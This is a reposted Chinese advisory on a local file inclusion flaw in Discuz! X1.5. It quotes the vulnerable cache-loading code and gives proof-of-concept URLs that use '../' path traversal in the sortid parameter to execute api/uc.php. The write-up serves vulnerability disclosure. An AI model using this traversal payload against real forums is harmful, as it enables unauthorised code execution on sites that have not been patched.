网站首页 网站建设 IT知识 IT知识教程 DISCUZ X1.5 本地文件包含漏洞说明

DISCUZ X1.5 本地文件包含漏洞说明

2021-05-25 21:23:42
config_global.php

复制代码代码如下:
  $_config['cache']['type'] = ‘file’;
  function cachedata($cachenames) {
  ……
  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;
  ……
  if($isfilecache) {
  $lostcaches = array();
  foreach($cachenames as $cachename) {
  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
  $lostcaches[] = $cachename;
  }
  }
  ……
  }
  地址:
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
  执行了 api/uc.php 页面代码了。
  作者: Jannock

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。 如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章

UCenter 1.6.0 能够在所有Discuz!版本中使用
有些站点使用的是Discuz!7.2或是还未升级的Discuz!X1.5,却将UCenter升级到了1.6.0版本,那么必须使用的对应版本的uc_client才
Discuz! X3.4 X3.3 UC(/uc_server/data/tmp)上传执行漏洞修复
Discuz!X3.4X3.3UC(/uc_server/data/tmp)上传执行漏洞修复(阿里云热修复补丁):介绍:在Discuz中,uc_key是UC客户
PHP 小心urldecode引发的SQL注入漏洞
Ihipop学校的DiscuzX1.5论坛被黑,在那里吵了一个下午。Google一下“Discuz!X1-1.5notify_credit.phpBlindSQ
DISCUZ X1.5 本地文件包含漏洞
  DISCUZX1.5本地文件包含,当然是有条件的,就是使用文件作为缓存。  config_global.php  $_config['cache']['ty
黑客如何利用文件包含漏洞进行网站入侵
一、看见漏洞公告  最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS1.2.6系统的下列文件存在文件包含漏洞

最新文章

载入进度条 效果
邮件发送简单例子-html文件
详解关于html,css,js三者的加载顺序问题
限制复选框的最大可选数
随鼠标上下滚动的jquery代码

hot 热门文章

python模拟登陆Tom邮箱示例分享
苹果11抖音怎么投屏? iphone将投影投屏到电视的技巧
蚂蚁森林节气签怎么领
华为mate30怎么更新系统?华为mate30更新手机系统教程
小米电视怎么下载斗鱼

猜你喜欢

JavaScript 命名空间 使用介绍
javascript ���名规则 变量命名规则
javascript 秒表计时器实现代码
Javascript 面向对象之重载
JavaScript 面向对象之命名空间
以上产品还未完全满足我的所有需求,在下方提交我的专属需求
我的专属需求:
*手机号:
*验证码:
img
咨询报价
现在咨询
img

在线咨询

建站在线咨询
img

获取方案

获取建站报价/方案

我们联系您img

img

微信咨询

扫一扫添加
动力姐姐微信
img
img

TOP

我们尽快联系您